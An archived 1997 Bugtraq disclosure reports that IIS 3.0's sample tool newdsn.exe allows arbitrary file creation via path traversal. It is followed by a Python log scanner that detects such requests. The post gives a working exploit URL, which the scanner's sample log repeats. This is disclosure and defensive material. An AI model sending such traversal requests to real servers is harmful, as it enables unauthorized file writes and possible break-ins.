Bugtraq mailing list archives
samples from IIS allows creation of any file
From: aleph1 () DFW NET (Aleph One)
Date: Thu, 25 Sep 1997 15:20:13 -0500
---------- Forwarded message ----------
Date: Thu, 25 Sep 1997 16:15:14 +0300
From: Vytis Fedaravicius <vytix () FLOYD KTU LT>
To: NTBUGTRAQ () NTADVICE COM
Subject: samples from IIS allows creation of any file

Hello,

while playing with default installation of Microsoft IIS, I have discovered that tool for data source creation, newdsn.exe allows creation of *.mdb files with any name at any location. Eg. url

http://vulnerable.site.com/scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29er%2B%28*.mdb%29&dsn=Evil+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2Fevil.html&newdb=CREATE_DB&attr=

will create file evil.html in wwwroot directory. evil.html in fact is a Microsoft Access Database.

I am sure someone nasty can think of a DOS or even breaking in using this.

Software: MS IIS 3.0 default installation on WinNT 4.0 server
Solution: delete newdsn.exe :)

Microsoft was not informed about that, if someone wants, please feel free to forward this e-mail.

Vytis Fedaravicius
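A defender's check for the request described in the post, as an added example that is not part of the original message: it flags web log lines that hit newdsn.exe and notes when dbq traverses directories or names a file that is not *.mdb. The log layout (whitespace-separated fields with the full request target as one field), the sample lines and the function names are assumptions.

```python
from urllib.parse import parse_qs, unquote, urlsplit

# Path of the sample tool named in the post; compared case-insensitively
# because URL paths on IIS / Windows NT are not case-sensitive.
TOOL_PATH = "/scripts/tools/newdsn.exe"

def check_request(target):
    """Return reasons a request target is suspicious, or [] if it is not the tool."""
    try:
        parts = urlsplit(target)
    except ValueError:
        return []
    if unquote(parts.path).lower() != TOOL_PATH:
        return []
    reasons = ["request to newdsn.exe sample tool"]
    params = parse_qs(parts.query, keep_blank_values=True)  # also URL-decodes values
    for dbq in params.get("dbq", []):
        norm = dbq.replace("\\", "/")
        if ".." in norm.split("/"):
            reasons.append("dbq contains parent-directory traversal")
        if not norm.lower().endswith(".mdb"):
            reasons.append("dbq does not end in .mdb")
    if "CREATE_DB" in params.get("newdb", []):
        reasons.append("newdb=CREATE_DB requests file creation")
    return reasons

def scan(lines):
    """Return (line_number, target, reasons) for each log field that hits the tool."""
    hits = []
    for n, line in enumerate(lines, 1):
        for token in line.split():
            reasons = check_request(token)
            if reasons:
                hits.append((n, token, reasons))
    return hits

# Constructed sample log lines (not from the post); the layout is an assumption.
SAMPLE_LOG = [
    "192.0.2.5 GET /default.htm 200",
    "192.0.2.9 GET /scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver"
    "%2B%28*.mdb%29&dsn=Evil&dbq=..%2F..%2Fwwwroot%2Fevil.html&newdb=CREATE_DB&attr= 200",
    "192.0.2.7 GET /Scripts/Tools/NewDSN.exe?dsn=test&dbq=test.mdb 200",
]

if __name__ == "__main__":
    for n, target, reasons in scan(SAMPLE_LOG):
        print(f"line {n}: {'; '.join(reasons)}")
```

Any hit at all is worth reviewing on a production server, since the post's fix is to delete the sample tool.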